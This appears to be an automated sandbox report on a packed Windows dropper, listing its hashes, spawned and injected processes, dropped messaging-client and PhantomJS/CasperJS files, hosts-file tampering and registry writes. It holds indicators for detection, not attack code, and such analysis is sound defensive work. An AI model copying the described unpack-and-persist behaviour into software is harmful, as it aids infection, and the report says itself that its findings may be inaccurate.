Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour:
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9f9a67c6638e9dfd444546f658cb0529
SHA1: 58d3f0ee5722ea8adee1933f892cdb7e4203efa8
SHA256: a9a664067c41ad88b63aff34d28beaa28cdeb668607de5d60e302c4d89e099a1
SSDeep: 12288:T7BNWXW2/Br4O0UhJy8WotreJLskbz6yXT26HuYZvpekyY1l6bG68Syg:T7BMXW2/GO065eJhWKT2GvQkyAYq6
Size: 810496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-04-16 00:18:31
Analyzed on: WindowsXP SP3 32-bit
Summary:
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
win32mrocli2.exe:428
%original file name%.exe:1256
purple.exe:2604
unzip.exe:2576
unzip.exe:6116
unovkkdak.exe:4740
unovkkdak.exe:3644
eityzygishyx.exe:564
eityzygishyx.exe:4936
glhljywourzj.exe:2816
glhljywapnzj.exe:4856
glhljywapnzj.exe:4708
glhljyvzcczjsznjntrz.exe:2508
glhljywpp4zj.exe:3992
glhljyw1jczj.exe:5872
The Malware injects its code into the following process(es):
phantomjs197.exe:1664
File activity
The process %original file name%.exe:1256 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (3883 bytes)
%System%\mqyitew\tst (10 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\glhljyvzcczjsznjntrz.exe (0 bytes)
The process purple.exe:2604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
C:\dev\null\icons\24e5b564d56b4d1796b0dc4344959e47b69727e2.jpg.save (5 bytes)
C:\dev\null\icons\44fc67967f917b10ff19f38897c1bbd2d6ff2e35.jpg.save (5 bytes)
C:\dev\null\icons\583b4a20a047387492f6d590b5b9dde3f21c37fb.jpg.save (5 bytes)
C:\dev\null\icons\a8666123c3b28dcc219d1b77977b6b117925151b.jpg.save (5 bytes)
C:\dev\null\icons\38b72e51556edcd947566844b29968c385bfbc8b.jpg.save (5 bytes)
C:\dev\null\icons\245845f77a47c462b516fe16a04f4c2bca53f2af.jpg.save (5 bytes)
C:\dev\null\icons\b5e697d54a2a949708cb36ca28de44e15d94b77e.jpg.save (5 bytes)
C:\dev\null\icons\9235f133902a2e5a8c903257f30a33a9081eabc3.jpg.save (5 bytes)
C:\dev\null\icons\c11fa36622ea7c9801e8a7f1f8edbb090710860c.jpg.save (5 bytes)
C:\dev\null\icons\6f5c34656ae889d3a4be5752bac2ba158d914d30.jpg.save (5 bytes)
C:\dev\null\icons\d94f5c277f5a1bde18e7fb091adf4a691c0899e5.jpg.save (5 bytes)
C:\dev\null\icons\b688b8627d9ad1860fdd92f5b945854c0296c84e.jpg.save (5 bytes)
C:\dev\null\icons\666817ac7e958c3f00849b37a7331edb26e145ec.jpg.save (5 bytes)
C:\dev\null\icons\bd04b63ac46de0e663dbe85fde1c7e47ce3ff7f1.jpg.save (5 bytes)
C:\dev\null\icons\b76dbec37693329ba77eb18e79b39fb5fbf3054d.jpg.save (5 bytes)
C:\dev\null\icons\e6f6bbd5fafb7ff340f15ff6b3abc8caf850e315.jpg.save (5 bytes)
C:\dev\null\icons\d0c441ce203a51a3bae938018df3e5008a410d30.jpg.save (5 bytes)
C:\dev\null\icons\11e318a152e6529bbc35d7d9162e9c9aadad2ef0.jpg.save (5 bytes)
C:\dev\null\icons\3b76e70d5ed8690323495fb5524d677b5c609400.jpg.save (5 bytes)
C:\dev\null\icons\4553ab0ce0319aba787e20b0d556851615ccbb70.jpg.save (5 bytes)
C:\dev\null\icons\15e6a4765f6b8cce43698383bb17cfd498e02a0b.jpg.save (5 bytes)
C:\dev\null\icons\eaf0d8fd1743714599baf123924e6d3ac059156e.jpg.save (5 bytes)
C:\dev\null\icons\e341afabfc4d58e582d78a533eddb486d2f30ffc.jpg.save (5 bytes)
C:\dev\null\icons\8506be1381a997df1dc523e7b482ec01f38a4379.jpg.save (5 bytes)
C:\dev\null\icons\2c423a99e263dc28037c9fc1e8e84832ab2de9e3.jpg.save (5 bytes)
C:\dev\null\icons\5f210f8347bcd25e6f25ecc6247a7289a1d4f55c.jpg.save (5 bytes)
C:\dev\null\icons\25362109a4500f4c90538040e1231fcc629b3c8d.jpg.save (5 bytes)
C:\dev\null\icons\3da8e0656812f00e88ee3778e7770a849087c87b.jpg.save (5 bytes)
C:\dev\null\icons\2773de6db6f0bf389a1894aad4acf386d408f494.jpg.save (5 bytes)
C:\dev\null\icons\48b91aab153f9ffe7879a1cc6d89bbe6e083f7a0.jpg.save (5 bytes)
C:\dev\null\icons\913bc246c1791e69842270061dd6d042960dc94d.jpg.save (5 bytes)
C:\dev\null\icons\3784219f65e8d4e36cd26cde04e8821f423197e1.jpg.save (5 bytes)
C:\dev\null\icons\eaab6294c2c71677224bacb89dc712dcfaf5855e.jpg.save (5 bytes)
C:\dev\null\icons\301fc70c8fbd2a3017832c5c169bf2d324f3da7e.jpg.save (5 bytes)
C:\dev\null\icons\6d035cbf152f2f323826bc48cc9ed6edee5a5610.jpg.save (5 bytes)
C:\dev\null\icons\2d5f2725aeeb39d2b73fba914d1eaa5024119005.jpg.save (5 bytes)
C:\dev\null\icons\69a339461c86da40f494ed26abc1d12ff1f4fab5.jpg.save (5 bytes)
C:\dev\null\icons\63c0dab3c8b04b979ff8f4a9f29bd2286abc8c2c.jpg.save (5 bytes)
C:\dev\null\icons\277550b871fd84f39688ce0ae7e82f34d78f5db7.jpg.save (5 bytes)
C:\dev\null\icons\8aa806930ad4ca4a5ec3427c5796fbe91ee71f22.jpg.save (5 bytes)
C:\dev\null\icons\fec20686ac06dfd471656ea58f759f8ad50252b6.jpg.save (5 bytes)
C:\dev\null\icons\ca839c923b09a03377ccb1ff62af53ce474c9f76.jpg.save (5 bytes)
C:\dev\null\icons\152b17fd93e6588aae66c35eac8b90ceae152474.jpg.save (5 bytes)
C:\dev\null\icons\8a5ecd76a959529f6edfa0bc3d746f226de3cc1c.jpg.save (5 bytes)
C:\dev\null\icons\c626735a7764616e285ab8651240ddf7c227deff.jpg.save (5 bytes)
C:\dev\null\icons\d09c11dea18d4f26421157d9817b6a78333d421d.jpg.save (5 bytes)
C:\dev\null\icons\7a037474380e10e4114d34df27c7f719750f26b6.jpg.save (5 bytes)
C:\dev\null\icons\badeaad5b386acf782d712f79c2eaede1898fe8f.jpg.save (5 bytes)
C:\dev\null\icons\f92d9cd8314e6fd1ad6eac6baecb696abea59469.jpg.save (5 bytes)
C:\dev\null\icons\6c2add77cd1b32e41657342a1aa9c844bd68acd5.jpg.save (5 bytes)
C:\dev\null\accounts.xml.save (146 bytes)
C:\dev\null\icons\61bd633e8348cd7cda6332f0091b364fd1304228.jpg.save (5 bytes)
C:\dev\null\icons\41b3ad01aeabfff74efb3c00f8a6ef3c64d31f68.jpg.save (5 bytes)
C:\dev\null\icons\a51994902670d9aa461d0bcaf28104b8ff6d5f59.jpg.save (5 bytes)
C:\dev\null\icons\d5da8b1fd7bd631465419dbbce8358dfa2cb4abb.jpg.save (5 bytes)
C:\dev\null\icons\669ffde9f8d3aab3b99868ed8305d5251acf568b.jpg.save (5 bytes)
C:\dev\null\icons\59d0afc10817f666da61599f4ebae157b71b282a.jpg.save (5 bytes)
C:\dev\null\icons\6e8e61003aa3ea022af6aa587fa86776d3110c19.jpg.save (5 bytes)
C:\dev\null\icons\0629957ac0ac3c0984da13d12c9400ebdb01a4b2.jpg.save (5 bytes)
C:\dev\null\icons\23b81f9bc63ab275622657cd877dd9db2fbe451b.jpg.save (5 bytes)
C:\dev\null\icons\e27f4a709a4b91cd310cc12839c97b599d04443b.jpg.save (5 bytes)
C:\dev\null\icons\f0d7fdd2430fe14fe3b9936a81ecad86cc3b0d23.jpg.save (5 bytes)
C:\dev\null\icons\f2cc26fa05bcef7f833e02fde24fd44a5574e012.jpg.save (5 bytes)
C:\dev\null\status.xml.save (551 bytes)
C:\dev\null\icons\e6ba4580705b7614e6fc310ca2749c2c59557807.jpg.save (5 bytes)
C:\dev\null\icons\f95c1c6eb5593c9cb5589d267df1657a3d18cdc8.jpg.save (5 bytes)
C:\dev\null\icons\005fbc4b3cb146c8098badbc3e3c5c4516a2b2a0.jpg.save (5 bytes)
C:\dev\null\icons\3176e5c56e4007d4cec15d3e5ee7b3c05fc9d821.jpg.save (5 bytes)
C:\dev\null\icons\a797b30b4a519f36a19f4efcb662b555a42b77a9.jpg.save (5 bytes)
C:\dev\null\icons\1c197f09c6aa1ebc5f130a8cf5cc0721e8274160.jpg.save (5 bytes)
C:\dev\null\icons\7aaa0c3cef3bc52936bbf26f69d122a8531a4fdc.jpg.save (5 bytes)
C:\dev\null\icons\1d060cc267b0bdee1db9bf7e3b70db40fb2a1d1d.jpg.save (5 bytes)
C:\dev\null\icons\b85e74b2e16b150fc74c04bea72846d5ba861120.jpg.save (5 bytes)
C:\dev\null\icons\c51f62632c285d604506115f2488a8c529d86fff.jpg.save (5 bytes)
C:\dev\null\icons\d0043e0612cc62d10f3e56ff5605b97151fba2e2.jpg.save (5 bytes)
C:\dev\null\icons\c447baccbb86131f8b7f06455e5f784e7406875c.jpg.save (5 bytes)
C:\dev\null\icons\6f7a8a326b4d3ef245fab3019e730495bfa4b3ff.jpg.save (5 bytes)
C:\dev\null\icons\50ab434275cfb714e30f4ae6807d2d48e901f456.jpg.save (5 bytes)
C:\dev\null\icons\fcc65c34ab46530603387dc2b0cf203986424778.jpg.save (5 bytes)
C:\dev\null\icons\f86c0968b55852aff6fdb8134b83348477d205db.jpg.save (5 bytes)
C:\dev\null\icons\4806483986e60cad969a1707422a715d42f62161.jpg.save (5 bytes)
C:\dev\null\icons\e864caf001491035549485ec0ab163423e69da96.jpg.save (5 bytes)
C:\dev\null\icons\144ae9548d5b8c728a7d193cbad0e82270db5f59.jpg.save (5 bytes)
C:\dev\null\icons\73e1fa4cea1e684f9668a17985d5b3dab2447835.jpg.save (5 bytes)
C:\dev\null\icons\0aa6c2e449161c0e0f99b36cea819d0558926a91.jpg.save (5 bytes)
C:\dev\null\icons\b15a27be277dab59ec28552586bb2dd6ca6ccee7.jpg.save (5 bytes)
C:\dev\null\icons\e9adfad40f833f7762653ec212ec103c9f600f39.jpg.save (5 bytes)
C:\dev\null\icons\ab57c70dc1e997465b1a9b3211788914b7a19e96.jpg.save (5 bytes)
C:\dev\null\icons\c44004785c10a859dabfb2c9367cae0ffb703bf7.jpg.save (5 bytes)
C:\dev\null\icons\672f241bea6963a36dd5695b5fe3f4629376c0da.jpg.save (5 bytes)
C:\dev\null\icons\d6056b785ebc7f8b537ff356fd1ddcac0110bb1b.jpg.save (5 bytes)
C:\dev\null\icons\8c05df51218481539fe6057b6d3b389910492221.jpg.save (5 bytes)
C:\dev\null\icons\252a56b4ea1b746fcfee080190c17ea3427d84ab.jpg.save (5 bytes)
C:\dev\null\icons\485071ec7068eb6f1d0e5bea1128578b2c269adb.jpg.save (5 bytes)
C:\dev\null\icons\568310ec88a22903677e41668bf713d42201a7e3.jpg.save (5 bytes)
C:\dev\null\icons\bc44b5c3afd27ce45f8d3ff33a8ff00a67aa7be4.jpg.save (5 bytes)
C:\dev\null\icons\35c8f63338d1d8b3e105821ff6c073bc7e32c64b.jpg.save (5 bytes)
C:\dev\null\icons\bded82350b81a88f29535b3d2ff7f1d3174d0f62.jpg.save (5 bytes)
C:\dev\null\icons\6238f7b1beda6f61518a73109b44b1b4850cb076.jpg.save (5 bytes)
C:\dev\null\icons\4de41723633eaee5dbfdd3b81ab99d893ad5af5e.jpg.save (5 bytes)
C:\dev\null\icons\4c5abdf6fc4709a31250ed9282231dd73e53cb78.jpg.save (5 bytes)
C:\dev\null\icons\4c0acdeac39c421dfc981f9b5c3772ba7afef119.jpg.save (5 bytes)
C:\dev\null\certificates\x509\tls_peers\chat.facebook.com.save (5 bytes)
C:\dev\null\icons\1de34f64317b2abc9608e23df1dd6effb39a4d2d.jpg.save (5 bytes)
C:\dev\null\icons\b621750e66296ac0ea0dd7e7e50be53052cf1471.jpg.save (5 bytes)
C:\dev\null\icons\4fee2f853ee309b79a35c76650633a0ba58525b6.jpg.save (5 bytes)
C:\dev\null\icons\dab66afc9f14e3adb4b64533857fdd9c5d33cd0f.jpg.save (5 bytes)
C:\dev\null\icons\ac421f7a9c547c27c45627d1558c728621ab5df2.jpg.save (5 bytes)
C:\dev\null\icons\42fdc32270a1fd5a75143f4dd1556f2e96f74e7e.jpg.save (5 bytes)
C:\dev\null\icons\feb5bbd7f1ec2e48aa8bd9850279953f3cb8ff15.jpg.save (5 bytes)
C:\dev\null\icons\6b756679fda59cc6d3d320331e2e807e2e8034c4.jpg.save (5 bytes)
C:\dev\null\icons\2657185809fd100acc7077ef5ee905ed203b6bd2.jpg.save (5 bytes)
C:\dev\null\icons\b51bc5756e0f731155ee5826c634b66f611869be.jpg.save (5 bytes)
C:\dev\null\icons\d5da23a964bb94cdf1e0a47958c2e3e28274188a.jpg.save (5 bytes)
C:\dev\null\prefs.xml.save (7 bytes)
C:\dev\null\icons\3e63dcb89b4bc7d919bef1ef173908160712d926.jpg.save (5 bytes)
C:\dev\null\icons\0c9c6d01b7a9d095ccfcd1be369a914a09a4d6ca.jpg.save (5 bytes)
C:\dev\null\icons\71c42a9b04d4a6da914f77d0b0d6159dfc908582.jpg.save (5 bytes)
C:\dev\null\icons\a3d9268f0017c757b0fd28b53330fa36c49f2922.jpg.save (5 bytes)
C:\dev\null\icons\1d8a79b8deb9b1da5151f84490811142a3b33821.jpg.save (5 bytes)
C:\dev\null\icons\e72f15737758a50dc5b32ea4814411d9cf9c5454.jpg.save (5 bytes)
C:\dev\null\icons\f198472c67b151b158fb3dc895b69b66a9f72cdc.jpg.save (5 bytes)
C:\dev\null\icons\af79198bd964f03af2cf2dba4501d0750222d39c.jpg.save (5 bytes)
C:\dev\null\icons\3e017c5887de83134844c5987061bf0b59dd1fac.jpg.save (5 bytes)
C:\dev\null\icons\2bb6cad6d70c366fc0f207c411de48be190aafd3.jpg.save (5 bytes)
C:\dev\null\icons\bffa03620c634a5072f35a696bde7b15e1be170d.jpg.save (5 bytes)
C:\dev\null\icons\b1aa85b50bc38e97e673896a151287a5cc173d1d.jpg.save (5 bytes)
C:\dev\null\icons\7a367f364e432fea2fda687e66b21fe765938c9b.jpg.save (5 bytes)
C:\dev\null\icons\2662e11f4c739960de346f1b4a2ed159d5e2ab63.jpg.save (5 bytes)
C:\dev\null\icons\9e6c49c2ab23a89ea699f598a8c2539a2ce64c8c.jpg.save (5 bytes)
C:\dev\null\icons\3220b53edceccc88455498a6044922043fca8ad0.jpg.save (5 bytes)
C:\dev\null\icons\80105ce1d710b5e8db09b7979e2bdf81d129dd4a.jpg.save (5 bytes)
C:\dev\null\icons\395523545d38ccdf1bab7e03c8b5f3973c465f4d.jpg.save (5 bytes)
C:\dev\null\icons\fd5de0b5b5bc0c9db46898396c7c181cb5ed27dd.jpg.save (5 bytes)
C:\dev\null\icons\3c0120a98c4d6ae8d19fd4946c9addba294623a3.jpg.save (5 bytes)
C:\dev\null\icons\491ef8c5b8a22eeaa4a6c764f58a82b572063458.jpg.save (5 bytes)
C:\dev\null\icons\fda508ec035ed8be377a4e2d47d86c62d470c56d.jpg.save (5 bytes)
C:\dev\null\icons\ab0d22e02b11e53efe3533b906f55f612c933a64.jpg.save (5 bytes)
C:\dev\null\icons\31343e6619f34d02e94bef801548cf2a2e5058e4.jpg.save (5 bytes)
C:\dev\null\icons\1b58d9794274c7d75a1f0c8544ff7aa0e33256a0.jpg.save (5 bytes)
C:\dev\null\icons\2eaed5d088ced02f68e9e8db0755425b720c06a2.jpg.save (5 bytes)
C:\dev\null\icons\448dd396dac3de51a031b53270a89860afbe2508.jpg.save (5 bytes)
C:\dev\null\icons\70b8caba98bc624353433293dec0ca0d9dec5761.jpg.save (5 bytes)
C:\dev\null\icons\1ba35261202e2f87d9c312fbd792c55f662b8819.jpg.save (5 bytes)
C:\dev\null\icons\ebcb620b4604a59882f68714f2f32f11e42eeb5d.jpg.save (5 bytes)
C:\dev\null\icons\f75ecd3b906820a93d1cab5eddc3a89f7a2656b3.jpg.save (5 bytes)
C:\dev\null\icons\341afa921fc8402bd996cb690276976ed8acb5de.jpg.save (5 bytes)
C:\dev\null\icons\b98c1dcd1c8eb63e0557335f3ceb63d3e37e86a0.jpg.save (5 bytes)
C:\dev\null\icons\9f30caf38edc13cf99865a136b1d8a924983e9ab.jpg.save (5 bytes)
C:\dev\null\icons\92c02ea9a72036e3d437c6e1ea5e49ba0f467178.jpg.save (5 bytes)
C:\dev\null\icons\640c645551a704c54eff18836b7eae8ee0da0975.jpg.save (5 bytes)
C:\dev\null\icons\33ac15b05076bdc29117a7e7e072364626bcb7d5.jpg.save (5 bytes)
C:\dev\null\icons\dab069465fa334a7dbf839bc1b41e86e78ab97a0.jpg.save (5 bytes)
C:\dev\null\icons\4b870ba980703bb14fceb9f0970c66a97433060e.jpg.save (5 bytes)
C:\dev\null\icons\8b1a6971a8965fa993cbbe9f82a75322ccbdf3e7.jpg.save (5 bytes)
C:\dev\null\icons\18199163eecf1b7312ebcacd2ba8828cf04e2d27.jpg.save (5 bytes)
C:\dev\null\icons\2c8b0c86518a24fef9f6cf169713769d07fc4a47.jpg.save (5 bytes)
C:\dev\null\icons\d2b14958b1c462c9a453bd55d58413e1fa7506f8.jpg.save (5 bytes)
C:\dev\null\icons\8981eeb38add7f1fb59159d8cd14a69bfde94add.jpg.save (5 bytes)
C:\dev\null\icons\bdc26f85f6f911c631eb430af63385e92f7e63cc.jpg.save (5 bytes)
C:\dev\null\icons\17e83ae90356598435c2b10f836eb38d81c68b97.jpg.save (5 bytes)
C:\dev\null\icons\83a02ccc9667e6de04d506e1943699dae7038ffc.jpg.save (5 bytes)
C:\dev\null\icons\3d2e363d935d1dbb5dda889958207316d899bd2b.jpg.save (5 bytes)
C:\dev\null\icons\c6b99d22efe0c3d8b6975491077d1cf045aa35a2.jpg.save (5 bytes)
C:\dev\null\icons\2f26a8a25c51902edbe0b30f5ff669fd8ce47b6f.jpg.save (5 bytes)
C:\dev\null\icons\ef672920e507926187f15453894c8e65eb57a6e2.jpg.save (5 bytes)
C:\dev\null\icons\df706e4466ff63060bfe2817e250cb182458532c.jpg.save (5 bytes)
C:\dev\null\icons\06786df37768a4b1442258546b1cc8a25b9c1002.jpg.save (5 bytes)
C:\dev\null\icons\b060fb7221dbe24840e631a53de9c0c0b10b0307.jpg.save (5 bytes)
C:\dev\null\icons\1c697641b354de15eacffed0bd38c7287eb1da96.jpg.save (5 bytes)
The process unzip.exe:2576 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\purple\nssutil3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AddTrust_External_Root.pem (1 bytes)
%System%\mqyitew\purple\libpurple.dll (5873 bytes)
%System%\mqyitew\purple\ssl3.dll (1281 bytes)
%System%\mqyitew\purple\intl.dll (601 bytes)
%System%\mqyitew\purple\purple.exe (26 bytes)
%System%\mqyitew\purple\libnspr4.dll (1281 bytes)
%System%\mqyitew\purple\smime3.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_2048.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Verisign_Class3_Primary_CA.pem (834 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Internet_Authority_2010.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\ValiCert_Class_2_VA.pem (1 bytes)
%System%\mqyitew\purple\plugins\xmppdisco.dll (44 bytes)
%System%\mqyitew\purple\sqlite3.dll (3073 bytes)
%System%\mqyitew\purple\plugins\libyahoo.dll (22 bytes)
%System%\mqyitew\purple\plugins\xmppconsole.dll (37 bytes)
%System%\mqyitew\purple\ca-certs\Entrust.net_Secure_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Microsoft_Secure_Server_Authority_2010.pem (2 bytes)
%System%\mqyitew\purple\sasl2\saslGSSAPI.dll (36 bytes)
%System%\mqyitew\purple\libgobject-2.0-0.dll (2105 bytes)
%System%\mqyitew\purple\ca-certs\StartCom_Certification_Authority.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslPLAIN.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\AOL_Member_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslCRAMMD5.dll (601 bytes)
%System%\mqyitew\purple\libssp-0.dll (36 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceEVRootCA.pem (1 bytes)
%System%\mqyitew\purple\libplds4.dll (14 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Primary_Root_CA.pem (1 bytes)
%System%\mqyitew\purple\libgmodule-2.0-0.dll (36 bytes)
%System%\mqyitew\purple\nss3.dll (5873 bytes)
%System%\mqyitew\purple\freebl3.dll (1425 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_Global_eBusiness_CA-1.pem (964 bytes)
%System%\mqyitew\purple\libgcc_s_dw2-1.dll (601 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Root.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\statenotify.dll (15 bytes)
%System%\mqyitew\purple\plugins\ssl-nss.dll (28 bytes)
%System%\mqyitew\purple\sasl2\saslDIGESTMD5.dll (673 bytes)
%System%\mqyitew\purple\libjabber.dll (2321 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class3_Extended_Validation_CA.pem (2 bytes)
%System%\mqyitew\purple\libplc4.dll (15 bytes)
%System%\mqyitew\purple\ca-certs\CAcert_Class3.pem (2 bytes)
%System%\mqyitew\purple\ca-certs\Baltimore_CyberTrust_Root.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Thawte_Premium_Server_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\DigiCertHighAssuranceCA-3.pem (2 bytes)
%System%\mqyitew\purple\zlib1.dll (673 bytes)
%System%\mqyitew\purple\libglib-2.0-0.dll (7726 bytes)
%System%\mqyitew\purple\ca-certs\America_Online_Root_Certification_Authority_1.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\Deutsche_Telekom_Root_CA_2.pem (1 bytes)
%System%\mqyitew\purple\plugins\ssl.dll (12 bytes)
%System%\mqyitew\purple\plugins\libxmpp.dll (21 bytes)
%System%\mqyitew\purple\libxml2-2.dll (7971 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_Class_3_Public_Primary_Certification_Authority_-_G2.pem (1 bytes)
%System%\mqyitew\purple\libgthread-2.0-0.dll (44 bytes)
%System%\mqyitew\purple\softokn3.dll (673 bytes)
%System%\mqyitew\purple\ca-certs\Go_Daddy_Class_2_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\VeriSign_International_Server_Class_3_CA.pem (1 bytes)
%System%\mqyitew\purple\sasl2\saslLOGIN.dll (601 bytes)
%System%\mqyitew\purple\libsasl.dll (673 bytes)
%System%\mqyitew\purple\libymsg.dll (1281 bytes)
%System%\mqyitew\purple\ca-certs\Equifax_Secure_CA.pem (1 bytes)
%System%\mqyitew\purple\ca-certs\GTE_CyberTrust_Global_Root.pem (876 bytes)
%System%\mqyitew\purple\sasl2\saslANONYMOUS.dll (601 bytes)
The process unzip.exe:6116 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\dropbox\package.json (767 bytes)
%System%\mqyitew\dropbox\googleTakeout.js (14 bytes)
%System%\mqyitew\dropbox\mouse.js (4 bytes)
%System%\mqyitew\dropbox\phantomjs197.exe (53130 bytes)
%System%\mqyitew\dropbox\querystring.js (5 bytes)
%System%\mqyitew\dropbox\casper.js (601 bytes)
%System%\mqyitew\dropbox\cli.js (5 bytes)
%System%\mqyitew\dropbox\pagestack.js (4 bytes)
%System%\mqyitew\dropbox\http.js (2 bytes)
%System%\mqyitew\dropbox\colorizer.js (4 bytes)
%System%\mqyitew\dropbox\bootstrap.js (14 bytes)
%System%\mqyitew\dropbox\events.js (8 bytes)
%System%\mqyitew\dropbox\tester.js (59 bytes)
%System%\mqyitew\dropbox\dropbox2.js (25 bytes)
%System%\mqyitew\dropbox\clientutils.js (35 bytes)
%System%\mqyitew\dropbox\utils.js (21 bytes)
%System%\mqyitew\dropbox\xunit.js (6 bytes)
The process unovkkdak.exe:4740 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\tst (10 bytes)
The process unovkkdak.exe:3644 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%WinDir%\Temp\glhljywourzj.exe (5873 bytes)
%System%\unzip.exe (7100 bytes)
%System%\win64mrocli2.exe (76437 bytes)
%System%\mqyitew\purple\purple.zip (90422 bytes)
%System%\mqyitew\rng (152 bytes)
%WinDir%\Temp\glhljywg9qzj.exe (1940 bytes)
%System%\win32mrocli2.exe (27367 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\mqyitew\run (10 bytes)
%System%\mqyitew\por (1 bytes)
%System%\mqyitew\ihst (226 bytes)
%WinDir%\Temp\glhljywapnzj.exe (35 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (35 bytes)
%System%\mqyitew\dropbox\dropbox.zip (181699 bytes)
%System%\mqyitew\purple\zip.exe (10500 bytes)
%System%\win64mroaes2.exe (76437 bytes)
%System%\eityzygishyx.exe (5873 bytes)
%System%\mqyitew\cfg (659 bytes)
%System%\mqyitew\purple\exefile (14580 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (35 bytes)
The Malware deletes the following file(s):
%WinDir%\Temp\glhljywg9qzj.exe (0 bytes)
%WinDir%\Temp\glhljywpp4zj.exe (0 bytes)
%WinDir%\Temp\glhljywapnzj.exe (0 bytes)
%WinDir%\Temp\glhljywourzj.exe (0 bytes)
%WinDir%\Temp\glhljyw1jczj.exe (0 bytes)
The process eityzygishyx.exe:564 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\tst (10 bytes)
The process eityzygishyx.exe:4936 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\tst (10 bytes)
The process glhljywourzj.exe:2816 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\mqyitew\tst (10 bytes)
The process glhljyvzcczjsznjntrz.exe:2508 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%System%\unovkkdak.exe (5873 bytes)
%System%\mqyitew\etc (10 bytes)
%System%\mqyitew\tst (10 bytes)
%System%\drivers\etc\hosts (22 bytes)
The Malware deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
Registry activity
The process win32mrocli2.exe:428 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 42 C4 94 38 EB 38 31 4D 99 8C 2C 55 3D 01 4A"
The process purple.exe:2604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 C8 88 3A 88 6E FB E9 30 08 9B B1 94 7C C2 28"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process phantomjs197.exe:1664 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 55 34 F3 51 25 81 05 D4 FA 59 B0 82 A0 F5 9C"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
The process unzip.exe:2576 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 53 A8 70 F7 D1 4A AC C5 BF 44 C5 34 E1 81 04"
The process unzip.exe:6116 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 FE D8 78 94 75 1C E4 41 01 0F 2D 60 8D E5 6C"
The process unovkkdak.exe:3644 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
